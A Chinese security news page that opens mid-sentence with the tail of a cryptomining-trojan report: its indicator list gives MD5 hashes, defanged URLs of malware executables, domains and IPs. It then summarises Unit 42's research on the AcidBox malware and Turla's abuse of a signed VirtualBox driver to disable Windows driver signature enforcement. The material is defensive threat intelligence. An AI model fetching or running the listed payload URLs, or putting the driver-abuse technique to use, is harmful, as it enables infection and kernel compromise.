清除其他挖矿木马也更加全面 IOCs MD5 3841eed7224b111b76b39fe032061ee7 a865ec970a4021f270359761d660547c 70e694d073c0440d9da37849b1a06321 4a72e30c0a582b082030adfd8345014f 645564cf1c80e047a6e90ac0f2d6a6b7 ce614abf6d6c1bbeefb887dea08c18a3 f03f640de2cb7929bbbafa3883d1b2a9 5d2e9716be941d7c77c05947390de736 3a1e14d9bbf7ac0967c18a24c4fd414b dc60a503fb8b36ab4c65cdfa5bd665a1 9450249ae964853a51d6b55cd55c373e f4f11dc6aa75d0f314eb698067882dd5 18936d7a1d489cb1db6ee9b48c6f1bd2 b660ad2c9793cd1259560bbbfbd89ce6 2ee0787a52aaca0207a73ce8048b0e55 URLs hxxp://www.362com.com/32.exe hxxp://www.362com.com/64.exe hxxp://118.45.42.72/Update.txt hxxp://118.45.42.72/22.exe hxxp://www.362com.com/Update.txt hxxp://124.160.126.238/1.exe hxxp://124.160.126.238/tq.exe hxxp://124.160.126.238/11.exe hxxp://124.160.126.238/Down.exe hxxp://124.160.126.238/MSSQL.exe Domain www.361com.com www.362com.com 22ssh.com IP 124.160.126.238 （ZoomEye搜索结果） 118.45.42.72 （ZoomEye搜索结果）

2014年一个名为Turla Group的恶意软件组织消息出现，爱沙尼亚外交情报局推断它源于俄罗斯，代表俄罗斯联邦安全局（FSB）进行运作，该组织核心恶意软件也被公开描述为第一个滥用第三方程序来禁用DSE的案例。在Windows Vista中引入了这种安全机制，以防止未签名的驱动程序加载到内核空间。Turla利用了签名的VirtualBox驱动程序——VBoxDrv.sysv1.6.2来停用DSE，然后对未签名的有效负载驱动程序进行加载。 然而，这个漏洞有一些混淆，它被称为CVE-2008-3431。Turla使用的漏洞实际上滥用了两个漏洞，其中只有一个在前面提到的CVE中被修复过。另一个漏洞与CVE-2008-3431一起用在第一个攻击版本中，第二个攻击版本大约在2014年引入了内核模式恶意软件，其只使用了未修补的漏洞，我们将在后面详细讨论。 2019年2月，Unit 42发现了尚未知晓的威胁因素（信息安全社区不知道），发现第二个未修补的漏洞不仅可以利用VirtualBox VBoxDrv.sys驱动程序 v1.6.2，还可以利用 v3.0.0以下的所有其他版本。此外我们研究发现这个未知的参与者利用VirtualBox驱动程序2.2.0版，在2017年攻击至少两个不同的俄罗斯组织。我们猜测这样做是因为驱动程序版本2.2.0并不易受攻击，因此很可能不会被安全公司发现。由于没有发现其他受害者，我们认为这是一个非常罕见的恶意软件，仅用于目标攻击。 操作者使用了一个之前未知的恶意软件家族，我们称之为AcidBox。由于该恶意软件的复杂性、稀有性以及它是一个更大的工具集的一部分这一事实，我们相信它被高级威胁参与者用于定向攻击。如果攻击者仍然活跃的话，这个恶意软件很可能今天仍在使用。但是，我们预计它在一定程度上被重写了。根据我们掌握的信息，我们认为除了使用过的漏洞之外，这个未知的威胁因素与Turla无关。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1247/     消息来源：paloaltonetworks，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接